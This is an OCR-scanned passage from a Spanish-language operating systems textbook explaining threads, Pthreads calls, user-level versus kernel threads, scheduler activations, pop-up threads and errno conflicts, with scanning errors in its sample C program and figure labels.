
Alarmas pendientes 


Señales y manejadores de señales 


Información contable 



Figura 2-12. La primera columna lista algunos elementos compartidos por todos los 
hilos en un proceso; la segunda, algunos elementos que son privados para cada hilo. 


Los elementos en la primera columna son propiedades de un proceso, no de un hilo. Por ejem¬ 
plo, si un hilo abre un archivo, ese archivo está visible para los demás hilos en el proceso y pueden 
leer y escribir datos en él. Esto es lógico, ya que el proceso es la unidad de administración de re¬ 
cursos, no el hilo. Si cada hilo tuviera su propio espacio de direcciones, archivos abiertos, alarmas 
pendientes, etcétera, sería un proceso separado. Lo que estamos tratando de lograr con el concepto 
de los hilos es la habilidad de que varios hilos de ejecución compartan un conjunto de recursos, de 
manera que puedan trabajar en conjunto para realizar cierta tarea. 

Al igual que un proceso tradicional (es decir, un proceso con sólo un hilo), un hilo puede estar 
en uno de varios estados: en ejecución, bloqueado, listo o terminado. Un hilo en ejecución tiene la 
CPU en un momento dado y está activo. Un hilo bloqueado está esperando a que cierto evento lo 
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desbloquee. Por ejemplo, cuando un hilo realiza una llamada al sistema para leer datos del teclado, 
se bloquea hasta que se escribe la entrada. Un hilo puede bloquearse en espera de que ocurra algún 
evento externo o que algún otro hilo lo desbloquee. Un hilo listo se programa para ejecutarse y lo 
hará tan pronto como sea su turno. Las transiciones entre los estados de los hilos son las mismas 
que las transiciones entre los estados de los procesos y se ilustran en la figura 2-2. 

Es importante tener en cuenta que cada hilo tiene su propia pila, como la figura 2-13 lo ilustra. 
La pila de cada hilo contiene un conjunto de valores para cada procedimiento llamado, pero del que 
todavía no se ha regresado. Este conjunto de valores contiene las variables locales del procedimiento 
y la dirección de retorno que se debe utilizar cuando haya terminado la llamada al procedimien¬ 
to. Por ejemplo, si el procedimiento X llama al procedimiento Y y Y llama al procedimiento Z, 
entonces mientras se ejecuta Z, los conjuntos de valores para X, Y y Z estarán todos en la pila. Por 
lo general, cada hilo llama a distintos procedimientos y por ende, tiene un historial de ejecución di¬ 
ferente. Esta es la razón por la cual cada hilo necesita su propia pila. 


Hilo 2 



Proceso 


Pila del hilo 3 


Figura 2-13. Cada hilo tiene su propia pila. 


Cuando hay multihilamiento, por lo general los procesos empiezan con un solo hilo presente. 
Este hilo tiene la habilidad de crear hilos mediante la llamada a un procedimiento de biblioteca, co¬ 
mo thread_create. Comúnmente, un parámetro para thread_create especifica el nombre de un pro¬ 
cedimiento para que se ejecute el nuevo hilo. No es necesario (ni posible) especificar nada acerca 
del espacio de direcciones del nuevo hilo, ya que se ejecuta de manera automática en el espacio de 
direcciones del hilo creador. Algunas veces los hilos son jerárquicos, con una relación padre-hijo, 
pero a menudo no existe dicha relación y todos los hilos son iguales. Con o sin una relación jerár¬ 
quica, el hilo creador generalmente recibe un identificador de hilo que da nombre al nuevo hilo. 

Cuando un hilo termina su trabajo, puede salir mediante la llamada a un procedimiento de bi¬ 
blioteca, como thread_exit. Después desaparece y ya no puede planificarse para volver a ejecutar¬ 
se. En algunos sistemas con hilos, un hilo puede esperar a que un hilo (específico) termine mediante 
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la llamada a un procedimiento, por ejemplo thread_join. Este procedimiento bloquea al hilo llama¬ 
dor hasta que un hilo (específico) haya terminado. En este aspecto, la creación y terminación de hi¬ 
los es algo muy parecido a la creación y terminación de procesos, conteniendo casi las mismas 
opciones. 

Otra llamada de hilos común es thread_yield, que permite a un hilo entregar voluntariamente 
la CPU para dejar que otro hilo se ejecute. Dicha llamada es importante, ya que no hay una inte¬ 
rrupción de reloj para implementar en realidad la multiprogramación, como en los procesos. Por 
ende, es importante que los hilos sean amables y entreguen de manera voluntaria la CPU de vez en 
cuando, para dar a otros hilos la oportunidad de ejecutarse. Otras llamadas permiten a un hilo espe¬ 
rar a que otro termine cierto trabajo, y que otro anuncie que ya terminó cierto trabajo, y así sucesi¬ 
vamente. 

Aunque los hilos son útiles a menudo, también introducen cierto número de complicaciones en 
el modelo de programación. Para empezar, considere los efectos de la llamada al sistema fonk de 
UNIX. Si el proceso padre tiene varios hilos, ¿deberá el hijo tenerlos también? Si no es así, el pro¬ 
ceso podría no funcionar en forma apropiada, ya que todos ellos podrían ser esenciales. 

No obstante, si el proceso hijo obtiene tantos hilos como el padre, ¿qué ocurre si un hilo en el 
padre se bloqueó en una llamada read, por ejemplo, del teclado? ¿Hay ahora dos hilos bloqueados 
en el teclado, uno en el padre y otro en el hijo? Cuando se escriba una línea, ¿obtendrán ambos hi¬ 
los una copia de ella? ¿Será sólo para el padre? ¿O sólo para el hijo? El mismo problema existe con 
las conexiones abiertas de red. 

Otra clase de problemas se relaciona con el hecho de que los hilos comparten muchas estruc¬ 
turas de datos. ¿Qué ocurre si un hilo cierra un archivo mientras otro aún está leyendo datos de él? 
Suponga que un hilo detecta que hay muy poca memoria y empieza a asignar más. A mitad del pro¬ 
ceso, ocurre una conmutación de hilos y el nuevo hilo también detecta que hay muy poca memoria 
y también empieza a asignar más memoria. Es muy probable que se asigne memoria dos veces. Es¬ 
tos problemas se pueden resolver con cierto esfuerzo, pero es necesario pensar y diseñar con cuida¬ 
do para que los programas con multihilamiento funcionen de la manera correcta. 


2.2.3 Hilos en POSIX 

Para que sea posible escribir programas con hilos portátiles, el IEEE ha definido un estándar para 
los hilos conocido como 1003.1c. El paquete de hilos que define se conoce como Pthreads. La ma¬ 
yoría de los sistemas UNIX aceptan este paquete. El estándar define más de 60 llamadas a funcio¬ 
nes, que son demasiadas como para verlas en este libro. En vez de ello, describiremos sólo algunas 
de las más importantes, para que el lector tenga una idea de cómo funcionan. Las llamadas que des¬ 
cribiremos se listan en la figura 2-14. 

Todos los hilos Pthreads tienen ciertas propiedades. Cada uno tiene un identificados un con¬ 
junto de registros (incluyendo el contador de programa) y un conjunto de atributos, que se almace¬ 
nan en una estructura. Los atributos incluyen el tamaño de la pila, parámetros de planificación y 
otros elementos necesarios para utilizar el hilo. 
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Llamada de hilo 

Descripción 

Pthread_create 

Crea un nuevo hilo 

Pthread ex¡t 

Termina el hilo llamador 

Pthreadjoin 

Espera a que un hilo específico termine 

Pthread yield 

Libera la CPU para dejar que otro hilo se ejecute 

Pthread_attr_¡nit 

Crea e inicializa la estructura de atributos de un hilo 

Pthread_attr_destroy 

Elimina la estructura de atributos de un hilo 


Figura 2-14. Algunas de las llamadas a funciones de Pthreads. 


Para crear un hilo se utiliza la llamada a pthread_create. El identificador de hilo o el hilo re¬ 
cién creado se devuelven como el valor de la función. La llamada es intencionalmente muy pareci¬ 
da a la llamada al sistema fork, donde el identificador del hilo juega el papel del PID, en buena 
medida para identificar a los hilos referenciados en otras llamadas. 

Cuando un hilo ha terminado el trabajo que se le asignó, puede terminar llamando a pthread_e- 
xit. Esta llamada detiene el hilo y libera su pila. 

A menudo, un hilo necesita esperar a que otro termine su trabajo y salga para poder continuar. 
El hilo que está esperando llama a pthread_join para esperar a que otro hilo específico termine. El 
identificador de hilo del hilo al que se va a esperar se proporciona como parámetro. 

Algunas veces sucede que un hilo no está lógicamente bloqueado, pero siente que se ha ejecu¬ 
tado el tiempo suficiente y desea dar a otro hilo la oportunidad de ejecutarse. Para lograr este obje¬ 
tivo hace una llamada a pthread_yield. No hay una llamada así para los procesos, debido a que se 
supone que los procesos son en extremo competitivos y cada uno desea tener a la CPU todo el tiem¬ 
po que pueda. Sin embargo, como los hilos de un proceso están trabajando en conjunto y su códi¬ 
go fue escrito indudablemente por el mismo programador, algunas veces éste desea darles a otros 
hilos una oportunidad. 

Las siguientes dos llamadas a hilos tratan con los atributos. Pthread_attr_init crea la estructu¬ 
ra de atributos asociada con un hilo y la inicializa con los valores predeterminados. Estos valores 
(como la prioridad) se pueden modificar mediante la manipulación de campos en la estructura de 
atributos. 

Por último, pthread_attr_destroy elimina la estructura de atributos de un hilo, liberando su me¬ 
moria. No afecta a los hilos que la utilizan; éstos siguen existiendo. 

Para tener una mejor idea de la forma en que funciona Pthreads, considere el ejemplo simple 
de la figura 2-15. Aquí el programa principal itera NUMER0_DE_HIL0S veces, creando un nue¬ 
vo hilo en cada iteración, después de anunciar su intención. Si falla la creación del hilo, imprime 
un mensaje de error y después termina. Después de crear todos los hilos, el programa principal ter¬ 
mina. 

Cuando se crea un hilo, éste imprime un mensaje de una línea anunciándose a sí mismo y des¬ 
pués termina. El orden en el que se intercalan los diversos mensajes no es determinado, y puede va¬ 
riar entre una ejecución del programa y otra. 
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#include <pthread.h> 

#include <stdio.h> 

#include <stdlib.h> 

#def¡ne NUMERO_DE_HILOS 10 

void *impr¡m¡r_hola_mundo(void *tid) 

{ 

/* Esta función imprime ei identificador dei hiio y después termina. 7 
printf(“Hoia mundo. Saiudos dei hiio %d0, tid); 
pthread_exit(NULL); 

} 

int main(int argc, char *argv[]) 

{ 

/* Ei programa principai crea 10 hiios y después termina. 7 
pthreadj hilos[NUMERO_DE_HILOS]; 
int estado, i; 

for{i=0; i < NUMERO_DE_HiLOS; i++) { 
printf(“Aqui main. Creando hiio %d0, i); 

estado = pthread_create(%hiios[i], NUIL, imprimir_hoia_mundo, (void *)i); 
if (estado != 0) { 

printf(“Ups. pthread_create devoivió ei codigo de error %d0, estado); 
exit(-l); 

} 

} 

exit(NULL); 


Figura 2-15. Un programa de ejemplo que utiliza hilos. 


Las llamadas de Pthreads antes descritas no son en definitiva las únicas; hay muchas más. Más 
adelante analizaremos algunas de las otras, después de hablar sobre los procesos y la sincronización 
de hilos. 

2.2.4 Implementación de hilos en el espacio de usuario 

Hay dos formas principales de implementar un paquete de hilos; en espacio de usuario y en el ker- 
nel. La elección es un poco controversia! y también es posible una implementación híbrida. Ahora 
describiremos estos métodos, junto con sus ventajas y desventajas. 

El primer método es colocar el paquete de hilos completamente en espacio de usuario. El ker- 
nel no sabe nada acerca de ellos. En lo que al kernel concierne, está administrando procesos ordina¬ 
rios con un solo hilo. La primera ventaja, la más obvia, es que un paquete de hilos de nivel usuario 
puede implementarse en un sistema operativo que no acepte hilos. Todos los sistemas operativos 
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solían entrar en esta categoría e incluso hoy en día algunos todavía lo están. Con este método, los hi¬ 
los se implementan mediante una biblioteca. 

Todas estas implementaciones tienen la misma estructura general, que se ilustra en la figu¬ 
ra 2-16(a). Los hilos se ejecutan encima de un sistema en tiempo de ejecución, el cual es una co¬ 
lección de procedimientos que administran hilos. Ya hemos visto cuatro de éstos: pthread_create, 
pthread_exit, pthread_join y pthread_yield,peroporlo general hay más. 


Proceso 


Hilo 


Espacio 
de usuario y 


Espacio r 
de kernel t 



Sistema en tiempo Tabla Tabla de 

de ejecución de hilos procesos 


Proceso Hilo 



procesos de hilos 


(a) 


(b) 


Figura 2-16. (a) Un paquete de hilos de nivel usuario, (b) Un paquete de hilos admi¬ 
nistrado por el kemel. 


Cuando los hilos se administran en espacio de usuario, cada proceso necesita su propia tabla 
de hilos privada para llevar la cuenta de los hilos en ese proceso. Esta tabla es similar a la tabla de 
procesos del kernel, excepto porque sólo lleva la cuenta de las propiedades por cada hilo, como el 
contador de programa, apuntador de pila, registros, estado, etc. La tabla de hilos es administrada por 
el sistema en tiempo de ejecución. Cuando un hilo pasa al estado listo o bloqueado, la información 
necesaria para reiniciarlo se almacena en la tabla de hilos, en la misma forma exacta que el kernel 
almacena la información acerca de los procesos en la tabla de procesos. 

Cuando un hilo hace algo que puede ponerlo en estado bloqueado en forma local —por ejem¬ 
plo, esperar a que otro hilo dentro de su proceso complete cierto trabajo— llama a un procedimien¬ 
to del sistema en tiempo de ejecución. Este procedimiento comprueba si el hilo debe ponerse 
en estado bloqueado. De ser así, almacena los registros del hilo (es decir, sus propios registros) en 
la tabla de hilos, busca en la tabla un hilo listo para ejecutarse y vuelve a cargar los registros de la 
máquina con los valores guardados del nuevo hilo. Tan pronto como se conmutan el apuntador de 
pila y el contador de programa, el nuevo hilo vuelve otra vez a la vida de manera automática. Si 
la máquina tiene una instrucción para guardar todos los registros y otra para cargarlos de una sola 
vez, toda la conmutación de hilos se puede realizar con sólo unas cuantas instrucciones. Realizar 
una conmutación de hilos como éste es por lo menos una orden de magnitud (o tal vez más) más 
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veloz que hacer el trap al kernel y es un sólido argumento a favor de los paquetes de hilos de nivel 
usuario. 

Sin embargo, hay una diferencia clave con los procesos. Cuando un hilo termina de ejecutarse 
por el momento, por ejemplo, cuando llama a thread_yield, el código de thread_yield puede guar¬ 
dar la información del hilo en la tabla de hilos. Lo que es más, así puede entonces llamar al plani¬ 
ficador de hilos para elegir otro hilo y ejecutarlo. El procedimiento que guarda el estado del hilo y 
el planificador son sólo procedimientos locales, por lo que es mucho más eficiente invocarlos que 
realizar una llamada al kernel. Entre otras cuestiones, no se necesita un trap ni una conmutación de 
contexto, la memoria caché no necesita vaciarse, etc. Esto hace que la planificación de hilos sea 
muy rápida. 

Los hilos de nivel usuario también tienen otras ventajas. Permiten que cada proceso tenga su 
propio algoritmo de planificación personalizado. Por ejemplo, para algunas aplicaciones, las que 
tienen un hilo recolector de basura, es una ventaja no tener que preocuparse porque un hilo se de¬ 
tenga en un momento inconveniente. También se escalan mejor, ya que los hilos del kernel requie¬ 
ren sin duda algo de espacio en la tabla y en la pila del kernel, lo cual puede ser un problema si hay 
una gran cantidad de hilos. 

A pesar de su mejor rendimiento, los paquetes de hilos de nivel usuario tienen algunos pro¬ 
blemas importantes. El primero de todos es la manera en que se implementan las llamadas al sis¬ 
tema de bloqueo. Suponga que un hilo lee del teclado antes de que se haya oprimido una sola 
tecla. Es inaceptable permitir que el hilo realice la llamada al sistema, ya que esto detendrá a to¬ 
dos los hilos. Uno de los principales objetivos de tener hilos en primer lugar era permitir que 
cada uno utilizara llamadas de bloqueo, pero para evitar que un hilo bloqueado afectara a los de¬ 
más. Con las llamadas al sistema de bloqueo, es difícil ver cómo se puede lograr este objetivo sin 
problemas. 

Todas las llamadas al sistema se podrían cambiar para que quedaran sin bloqueo (por ejem¬ 
plo, un read en el teclado sólo devolvería 0 bytes si no hubiera caracteres en el búfer), pero es in¬ 
conveniente requerir cambios en el sistema operativo. Además, uno de los argumentos para los 
hilos de nivel usuario era precisamente que se podían ejecutar con los sistemas operativos existen¬ 
tes. Además, si se cambia la semántica de read se requerirán cambios en muchos programas de 
usuario. 

Es posible otra alternativa si se puede saber de antemano si una llamada va a bloquear. En al¬ 
gunas versiones de UNIX existe una llamada al sistema (select), la cual permite al procedimiento 
que hace la llamada saber si una posible llamada a read realizará un bloqueo. Cuando esta llama¬ 
da está presente, el procedimiento de biblioteca read se puede reemplazar con uno nuevo que pri¬ 
mero realice una llamada a select y después sólo realice la llamada a read si es seguro (es decir, si 
no va a realizar un bloqueo). Si la llamada a read va a bloquear, no se hace; en vez de ello, se eje¬ 
cuta otro hilo. La próxima vez que el sistema en tiempo de ejecución obtenga el control, puede com¬ 
probar de nuevo para ver si la llamada a read es ahora segura. Este método requiere que se vuelvan 
a escribir partes de la biblioteca de llamadas al sistema, es ineficiente y nada elegante, pero hay muy 
poca opción. El código colocado alrededor de la llamada al sistema que se encarga de la compro¬ 
bación se conoce como envoltura. 

Algo similar al problema de las llamadas al sistema de bloqueo es el problema de los fallos de 
página. En el capítulo 3 estudiaremos este tema. Por ahora, basta con decir que las computadoras 
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se pueden configurar de forma que no todo el programa se encuentre en memoria a la vez. Si el pro¬ 
grama llama o salta a una instrucción que no esté en memoria, ocurre un fallo de página y el siste¬ 
ma operativo obtiene la instrucción faltante (y las instrucciones aledañas) del disco. A esto se le 
conoce como fallo de página. El proceso se bloquea mientras la instrucción necesaria se localiza y 
se lee. Si un hilo produce un fallo de página, el kernel (que ni siquiera sabe de la existencia de los 
hilos) bloquea naturalmente todo el proceso hasta que se complete la operación de E/S, incluso si 
otros hilos pudieran ser ejecutados. 

Otro problema con los paquetes de hilos de nivel usuario es que, si un hilo empieza a ejecutar¬ 
se, ningún otro hilo en ese proceso se ejecutará a menos que el primero renuncie de manera volun¬ 
taria a la CPU. Dentro de un solo proceso no hay interrupciones de reloj, lo cual hace que sea 
imposible planificar procesos en el formato round robi n (tomando turnos). A menos que un hilo en¬ 
tre al sistema en tiempo de ejecución por su propia voluntad, el planificador nunca tendrá una opor¬ 
tunidad. 

Una posible solución al problema de los hilos que se ejecutan en forma indefinida es hacer que 
el sistema en tiempo de ejecución solicite una señal de reloj (interrupción) una vez por segundo pa¬ 
ra dar el control, pero esto también es crudo y complicado para un programa. No siempre son po¬ 
sibles las interrupciones periódicas de reloj a una frecuencia más alta e incluso si lo son, la 
sobrecarga total podría ser considerable. Lo que es peor: un hilo podría requerir también una inte¬ 
rrupción de reloj, interfiriendo con el uso que el sistema en tiempo de ejecución da al reloj. 

Otro argumento (que en realidad es el más devastador) contra los hilos de nivel usuario es que, 
por lo general, los programadores desean hilos precisamente en aplicaciones donde éstos se blo¬ 
quean con frecuencia, como, por ejemplo, un servidor Web con multihilado. Estos hilos están rea¬ 
lizando llamadas al sistema en forma constante. Una vez que ocurre un trap al kernel, de manera 
que lleve a cabo la llamada al sistema, no le cuesta mucho al kernel conmutar hilos si el anterior es¬ 
tá bloqueado y, al hacer esto el kernel, se elimina la necesidad de realizar llamadas al sistema 
select en forma constante que comprueben si las llamadas al sistema read son seguras. Para las 
aplicaciones que en esencia están completamente limitadas a la CPU y raras veces se bloquean, 
¿cuál es el objetivo de tener hilos? Nadie propondría con seriedad calcular los primeros n números 
primos o jugar ajedrez utilizando hilos, debido a que no se obtiene ninguna ventaja al hacerlo de es¬ 
ta forma. 

2.2.5 I mplementación de hilos en el kernel 

Ahora vamos a considerar el caso en que el kernel sabe acerca de los hilos y los administra. No se 
necesita un sistema en tiempo de ejecución para ninguna de las dos acciones, como se muestra en 
la figura 2-16(b). Además, no hay tabla de hilos en cada proceso. En vez de ello, el kernel tiene una 
tabla de hilos que lleva la cuenta de todos los hilos en el sistema. Cuando un hilo desea crear un 
nuevo hilo o destruir uno existente, realiza una llamada al kernel, la cual se encarga de la creación 
o destrucción mediante una actualización en la tabla de hilos del kernel. 

La tabla de hilos del kernel contiene los registros, el estado y demás información de cada hilo. 
Esta información es la misma que con los hilos de nivel usuario, pero ahora se mantiene en el ker¬ 
nel, en vez de hacerlo en espacio de usuario (dentro del sistema en tiempo de ejecución). Esta infor¬ 
mación es un subconjunto de la información que mantienen tradicionalmente los kernels acerca de 
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sus procesos con un solo hilo; es decir, el estado del proceso. Además, el kernel también mantiene 
la tabla de procesos tradicional para llevar la cuenta de los procesos. 

Todas las llamadas que podrían bloquear un hilo se implementan como llamadas al sistema, a 
un costo considerablemente mayor que una llamada a un procedimiento del sistema en tiempo de eje¬ 
cución. Cuando un hilo se bloquea, el kernel, según lo que decida, puede ejecutar otro hilo del mis¬ 
mo proceso (si hay uno listo) o un hilo de un proceso distinto. Con los hilos de nivel usuario, el 
sistema en tiempo de ejecución ejecuta hilos de su propio proceso hasta que el kernel le quita la CPU 
(o cuando ya no hay hilos para ejecutar). 

Debido al costo considerablemente mayor de crear y destruir hilos en el kernel, algunos siste¬ 
mas optan por un método ambientalmente correcto, reciclando sus hilos. Cuando se destruye un hi¬ 
lo, se marca como no ejecutable pero las estructuras de datos de su kernel no se ven afectadas de 
ninguna otra forma. Más adelante, cuando debe crearse un hilo, se reactiva uno anterior, lo que aho¬ 
rra cierta sobrecarga. El reciclaje de hilos también es posible para los hilos de nivel usuario, pero 
como la sobrecarga de la administración de los hilos es mucho menor, hay menos incentivos para 
hacer esto. 

Los hilos de kernel no requieren de nuevas llamadas al sistema sin bloqueo. Además, si un hi¬ 
lo en un proceso produce un fallo de página, el kernel puede comprobar con facilidad si el proceso 
tiene otros hilos que puedan ejecutarse y de ser así, ejecuta uno de ellos mientras espera a que se 
traiga la página requerida desde el disco. Su principal desventaja es que el costo de una llamada al 
sistema es considerable, por lo que si las operaciones de hilos (de creación o terminación, por ejem¬ 
plo) son comunes, se incurrirá en una mayor sobrecarga. 

Los hilos de kernel resuelven sólo algunos problemas, no todos. Por ejemplo, ¿qué ocurre 
cuando un proceso con multihilamiento utiliza la llamada a f ork para crear otro proceso? ¿El nue¬ 
vo proceso tiene los mismos hilos que el anterior o tiene sólo uno? En muchos casos, la mejor elec¬ 
ción depende de lo que el proceso planee realizar a continuación. Si va a llamar a exec para iniciar 
un nuevo programa, probablemente la elección correcta sea un hilo, pero si continúa en ejecución, 
tal vez lo mejor sea reproducir todos. 

Otra cuestión es la relacionada con las señales. Recuerde que las señales se envían a los proce¬ 
sos, no a los hilos, por lo menos en el modelo clásico. Cuando entra una señal, ¿qué hilo debe ha¬ 
cerse cargo de ella? Es posible que los hilos puedan registrar su interés en ciertas señales, de manera 
que cuando llegue una señal se envíe al hilo que la está esperando. Pero ¿que ocurre si dos o más 
hilos se registran para la misma señal? Estos son sólo dos de los problemas que introducen los hi¬ 
los, pero hay más. 


2.2.6 Implementaciones híbridas 

Se han investigado varias formas de tratar de combinar las ventajas de los hilos de nivel usuario con 
los hilos de nivel kernel. Una de esas formas es utilizar hilos de nivel kernel y después multiplexar los 
hilos de nivel usuario con alguno o con todos los hilos de nivel kernel, como se muestra en la figu¬ 
ra 2-17. Cuando se utiliza este método, el programador puede determinar cuántos hilos de kernel va a 
utilizar y cuántos hilos de nivel usuario va a multiplexar en cada uno. Este modelo proporciona lo úl¬ 
timo en flexibilidad. 
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Varios hilos de usuario 
en un hilo de kernel 



Con este método, el kernel está consciente SÓlo de los hilos de nivel kernel y los planifica. Al¬ 
gunos de esos hilos pueden tener varios hilos de nivel usuario multiplexados encima de ellos; los 
hilos de nivel de usuario se crean, destruyen y planifican de igual forma que los hilos de nivel usua¬ 
rio en un proceso que se ejecuta en un sistema operativo sin capacidad de multihilamiento. En este 
modelo, cada hilo de nivel kernel tiene algún conjunto de hilos de nivel usuario que toman turnos 
para utilizarlo. 

2.2.7 Activaciones del planificador 

Aunque los hilos de kernel son mejores que los hilos de nivel usuario en ciertas formas clave, tam¬ 
bién son sin duda más lentos. Como consecuencia, los investigadores han buscado formas de me¬ 
jorar la situación sin renunciar a sus propiedades positivas. A continuación describimos uno de esos 
métodos ideado por Anderson y colaboradores (1992), conocido como activaciones dei pianifica- 
dor. El trabajo relacionado se describe en las obras de Edler y colaboradores (1988), y de Scott y 
colaboradores (1990). 

Los objetivos del trabajo de una activación del planificador son imitar la funcionalidad de los 
hilos de kernel, pero con el mejor rendimiento y la mayor flexibilidad que por lo general se asocian 
con los paquetes de hilos implementados en espacio de usuario. En especial, los hilos de usuario no 
deben tener que realizar llamadas especiales al sistema sin bloqueo, ni comprobar de antemano que 
sea seguro realizar ciertas llamadas al sistema. Sin embargo, cuando un hilo se bloquea en una lla¬ 
mada al sistema o un fallo de página, debe ser posible ejecutar otros hilos dentro del mismo proce¬ 
so, si hay alguno listo. 

La eficiencia se obtiene evitando transiciones innecesarias entre los espacios de usuario y de 
kernel. Por ejemplo, si un hilo se bloquea en espera de que otro hilo realice alguna acción, no hay 
razón para involucrar al kernel, con lo cual se ahorra la sobrecarga de la transición de kernel a usua¬ 
rio. El sistema en tiempo de ejecución en espacio de usuario puede bloquear el hilo sincronizador 
y programar uno nuevo por sí solo. 
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Cuando se utilizan las activaciones del planificador, el kernel asigna cierto número de procesa¬ 
dores virtuales a cada proceso y deja que el sistema en tiempo de ejecución (en espacio de usuario) 
asigne hilos a los procesadores. Este mecanismo también se puede utilizar en un multiprocesador, 
donde los procesadores virtuales podrían ser CPUs reales. Al principio, el número de procesadores 
virtuales que se asigna a un proceso es uno, pero el proceso puede pedir más y también devolver pro¬ 
cesadores si ya no los necesita. El kernel también puede obtener de vuelta los procesadores virtuales 
que ya estén asignados, para poder asignarlos a procesos que tengan más necesidad. 

La idea básica que hace que este esquema funcione es que, cuando el kernel sabe que un hilo 
se ha bloqueado (por ejemplo, al ejecutar una llamada al sistema de bloqueo o al ocasionar un fa¬ 
llo de página), se lo notifica al sistema en tiempo de ejecución del proceso, pasándole como pará¬ 
metros a la pila el número del hilo en cuestión y una descripción del evento que ocurrió. Para 
realizar la notificación, el kernel activa el sistema en tiempo de ejecución en una dirección inicial 
conocida, no muy similar a una señal en UNIX. A este mecanismo se le conoce como llamada as¬ 
cendente (upca II). 

Una vez que se activa de esta forma, el sistema en tiempo de ejecución puede replanificar sus 
hilos, para lo cual comúnmente marca al hilo actual como bloqueado, tomando otro hilo de la lista 
de hilos listos, establece sus registros y lo reinicia. Más adelante, cuando el kernel detecta que el 
hilo original se puede ejecutar de nuevo (por ejemplo, la canal del que trataba de leer ya contiene 
datos, o la página que falló se trajo ya del disco), realiza otra llamada ascendente al sistema en tiem¬ 
po de ejecución para informarle sobre este evento. El sistema en tiempo de ejecución, a su propia 
discreción, puede reiniciar el hilo bloqueado de inmediato o colocarlo en la lista de hilos listos pa¬ 
ra ejecutarlo más adelante. 

Cuando ocurre una interrupción de hardware mientras un hilo de usuario se ejecuta, la CPU que 
se interrumpió conmuta al modo kernel. Si, cuando el manejador de interrupciones termina, la in¬ 
terrupción es producida por un evento que no sea de interés para el proceso interrumpido (como la 
terminación de una operación de E/S de otro proceso) coloca el hilo interrumpido de vuelta en el 
estado en el que estaba antes de la interrupción. No obstante, si el proceso está interesado en la in¬ 
terrupción, como la llegada de una página que requiere uno de los hilos del procesador, el hilo 
interrumpido no se reinicia. En vez de ello, el hilo interrumpido se suspende y el sistema en tiem¬ 
po de ejecución se inicia en esa CPU virtual, con el estado del hilo interrumpido en la pila. Des¬ 
pués, es responsabilidad del sistema en tiempo de ejecución decidir cuál hilo debe planificar en esa 
CPU: el que se interrumpió, el que acaba de pasar al estado listo o alguna otra tercera opción. 

Una objeción a las activaciones del planificador es la dependencia fundamental en las llama¬ 
das ascendentes, un concepto que viola la estructura inherente en cualquier sistema por capas. Por 
lo general, la capa n ofrece ciertos servicios que la capa n H- 1 puede llamar, pero la capa n no pue¬ 
de llamar a los procedimientos en la capa n H- 1 . Las llamadas ascendentes no siguen este principio 
fundamental. 

2.2.8 H ilos emergentes 

Los hilos se utilizan con frecuencia en los sistemas distribuidos. Un importante ejemplo es la for¬ 
ma en que se manejan los mensajes entrantes (por ejemplo, las peticiones de servicio). El método 
tradicional es hacer que un proceso o hilo, que está bloqueado en una llamada al sistema receive. 
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espere un mensaje entrante. Cuando llega un mensaje, lo acepta, lo desempaqueta, examina su con¬ 
tenido y lo procesa. 

Sin embargo, también es posible utilizar un método completamente distinto, en el cual la lle¬ 
gada de un mensaje hace que el sistema cree un nuevo hilo para manejar el mensaje. A dicho hilo 
se le conoce como hilo emergente (pop-up thread) y se ilustra en la figura 2-18. Una ventaja cla¬ 
ve de los hilos emergentes es que, como son nuevos, no tienen historial (registros, pila, etcétera) 
que sea necesario restaurar. Cada uno empieza desde cero y es idéntico a los demás. Esto hace que 
sea posible crear dicho hilo con rapidez. El nuevo hilo recibe el mensaje entrante que va a proce¬ 
sar. El resultado de utilizar hilos emergentes es que la latencia entre la llegada del mensaje y el ini¬ 
cio del procesamiento puede ser muy baja. 


Proceso 


Hilo emergente creado 
para manejar el 



Red 


(a) (b) 

Figura 2.18. Creación de un nuevo hilo cuando llega un mensaje, (a) Antes de que lle¬ 
gue el mensaje, (b) Después de que llega el mensaje. 


Es necesaria cierta planeación anticipada cuando se utilizan hilos emergentes. Por ejemplo, ¿en 
qué proceso se ejecuta el hilo? Si el sistema acepta hilos que se ejecutan en el contexto del kernel, 
el hilo se puede ejecutar ahí (lo que explica por qué no hemos mostrado el kernel en la figura 2-18). 
Hacer que el hilo emergente se ejecute en espacio de kernel es por lo general más rápido y sencillo 
que colocarlo en espacio de usuario. Además, un hilo emergente en espacio de kernel puede acce¬ 
der con facilidad a todas las tablas del kernel y a los dispositivos de E/S, que pueden ser necesarios 
para el procesamiento de interrupciones. Por otro lado, un hilo de kernel con errores puede hacer 
más daño que un hilo de usuario con errores. Por ejemplo, si se ejecuta durante demasiado tiempo 
y no hay manera de quitarlo, los datos entrantes se pueden perder. 
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2.2.9 C onversión de código de hilado simple a multihilado 

Muchos programas existentes se escribieron para procesos con un solo hilo. Es mucho más difícil 
convertir estos programas para que utilicen multihilamiento de lo que podría parecer en un princi¬ 
pio. A continuación analizaremos unos cuantos de los obstáculos. 

Para empezar, el código de un hilo normalmente consiste de varios procedimientos, al igual que 
un proceso. Estos pueden tener variables locales, variables globales y parámetros. Las variables y 
parámetros locales no ocasionan problemas, pero las variables que son globales a un hilo, pero no 
globales para todo el programa, son un problema. Hay variables que son globales en el sentido en 
el que muchos procedimientos dentro del hilo los utilizan (como podrían utilizar cualquier variable 
global), pero otros hilos deberían, por lógica, dejarlas en paz. 

Como ejemplo, considere la variable errno que mantiene UNIX. Cuando un proceso (o hilo) 
realiza una llamada al sistema que falla, el código de error se coloca en errno. En la figura 2-19, el 
hilo 1 ejecuta la llamada al sistema access para averiguar si tiene permiso para acceder a cierto ar¬ 
chivo. El sistema operativo devuelve la respuesta en la variable global errno. Una vez que el con¬ 
trol regresa al hilo 1, pero antes de que tenga la oportunidad de leer errno, el planificador decide 
que el hilo 1 ha tenido suficiente tiempo de la CPU por el momento y decide conmutar al hilo 2. El 
hilo 2 ejecuta una llamada a open que falla, lo cual hace que se sobrescriba el valor de errno y el 
código de acceso del hilo 1 se pierde para siempre. Cuando el hilo 1 se continúe más adelante, lee¬ 
rá el valor incorrecto y se comportará de manera incorrecta. 


Hilo 1 Hilo 2 

o 

Q. 

Q Access (se asigna errno) 

i_ 


Open (se sobrescribe errno) 

, _ ^ 

Se inspecciona errno 

Figura 2-19. Conflictos entre los hilos por el uso de una variable global. 

Hay varias soluciones posibles para este problema. Una es prohibir las variables globales por 
completo. Aunque este ideal parezca conveniente, entra en conflicto con una gran parte del softwa¬ 
re existente. Otra solución es asignar a cada hilo sus propias variables globales privadas, como se 
muestra en la figura 2-20. De esta forma, cada hilo tiene su propia copia privada de errno y de otras 
